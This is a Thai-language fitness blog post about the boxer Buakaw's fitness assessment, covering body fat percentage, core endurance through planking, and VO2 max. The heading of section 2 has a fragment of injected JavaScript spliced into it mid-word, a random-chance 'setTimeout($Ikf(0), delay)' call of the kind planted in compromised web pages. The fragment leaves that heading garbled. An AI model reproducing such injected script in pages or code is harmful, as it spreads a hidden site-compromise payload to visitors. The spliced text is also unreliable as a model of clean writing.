เรามาดูกันว่า เราสามารถเรียนรู้เจ้าตัว Physical Fitness Assessment ของบัวขาวเเล้วมาพัฒนาตัวเองอะไรได้บ้าง
1. มารู้จักกับ Body Composition
การวัด Body Composition เป็นเกณฑ์ช่วยให้เราติดตามความแข็งแรงของร่างกาย ในระหว่างออกกำลังกายได้เป็นอย่างดี เพราะตัวเลขบนตาชั่งไม่สามารถบ่งบอกได้ว่าจริง ๆ แล้วเรามีกล้ามเนื้อและไขมันในร่างกายมากน้อยแค่ไหนหากใครเข้าข่ายว่าอ้วนหรือเริ่มอ้วนแล้วก็อย่าลืมดูแลสุขภาพ และควบคุมน้ำหนักตัวให้อยู่ในเกณฑ์ที่เหมาะสม เพื่อป้องกันไม่ให้เกิดปัญหาสุขภาพหลาย ๆ ประการที่สามารถตามมาได้ในอนาคต การวิเคราะห์แยกส่วนประกอบของร่างกายออกเป็น 4 ส่วน คือ ส่วนของน้ำ กล้ามเนื้อ กระดูก และไขมัน ซึ่งช่วยให้ประเมินความอ้วนผอมได้แม่นยำมากขึ้น เอาง่ายๆ ถ้าอยากมี 6-pack อย่างน้อยต้องมีปริมาณไขมันที่ 13% นะครับ เเต่ของพี่บัวขาวเค้าไปที่ 7.2 % เเล้ว.
Fat % : อัตราของไขมันที่มีในร่างกาย ปกติแล้วมีน้อยยิ่งดี แต่เราควรจะมีไขมันติดตัวไว้บ้าง เพราะว่ากระบวนการทำงานของร่างกายต้องการไขมันเช่นกัน ดังนั้นตามการวิจัยได้บอกไว้ว่า % ไขมันที่ควรมีจะเป็นตามตารางนี้
การควบคุมปริมาณไขมันสามารถทำได้โดยการ ออกกำลัง ความคุมการกินอาหารและการผักผ่อนครับ
2. Core Strengh andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Endurance test
กล้ามเนื้อ Core Muscle เป็นหัวใจหลักเลยสำหรับทุกประเภทกีฬา การมี Core ที่เเข็งเเรงจะทำให้เราวิ่ง ปั่น ได้นานขึ้นเเละเร็วขึ้น พี่บัวขาวทำได้ 3 นาที ซึ่งถือว่าไม่ไกลเกินเอื้อมสำหรับคนที่อยากเพิ่มศักยภาพให้กับตัวเอง เเค่ Planking สัปดาห์ละ 3-4 ครั้ง จาก 30 วินาทีเเล้วค่อยๆ เพิ่มไปเป็น 1 นาทีเเละเพิ่มขึ้นเรื่อยๆ รับรอง 3 นาทีคุณทำได้เเน่
3. VO2 Max
นอกเหนือจากการฝึก Strength ที่ช่วยป้องกันไม่ให้ร่างกายบาดได้ง่าย มีความเเข็งเเรงของกล้ามเนื้อเเละข้อต่อและความยืดหยุ่นสูงขึ้นเเล้ว เราควรฝึกการออกกำลังกายแบบ Cardio ด้วย เพื่อออกกำลังกายให้ได้นานขึ้น อึดมากขึ้น ยิ่งสำหรับคนชอบวิ่ง ชอบปั่นไม่ควรพลาด ค่า VO2 Max หรือความสามารถในการใช้ออกซิเจน (oxygen consumption or oxygen uptake, VO2) หรือ ความสามารถทางแอโรบิค (aerobic capacity) หมายถึง ความสามารถของร่างกายในการเผาผลาญ
พลังงานโดยใช้ออกซิเจน ซึ่งร่างกายต้องใช้เวลาในการปล่อยพลังงานจากปฏิกริยาที่ใช้ออกซิเจน
การที่ร่างกายจะมีความสามารถทางแอโรบิคได้ดีนั้นต้องอาศัยการทํางานสัมพันธ์กนระหว่างระบบกล้ามเนื้อ ระบบหัวใจและหลอดเลือด และระบบหายใจ ดังนั้นการที่จะวัดความสามารถสูงสุดของความสามารถทางแอโรบิค มักจะต้องให้ร่างกายได้ทํากิจกรรมที่หนักพอ หรือออกกาลังกายที่หนักพอ จึงจัดเป็นการทดสอบด้วยการออกกาลังกายขึ้นมา (exercise testing) ซึ่งทําให้วัดปริมาณของ VO2 ได้ดียิงขึ้น จึงทําให้การวัดความสามารถทางแอโรบิค บางครั้งก็ใช้ในความหมายของการทดสอบด้วยการออกกาลังกายหรือการวัดความทนทานของหัวใจและหลอดเลือด ได้โดยมีวัตถุประสงค์เพื่อวัดค่าปริมาณสูงสุดของการใช้ออกซิเจนของร่างกาย (VO2 max) นั้นเอง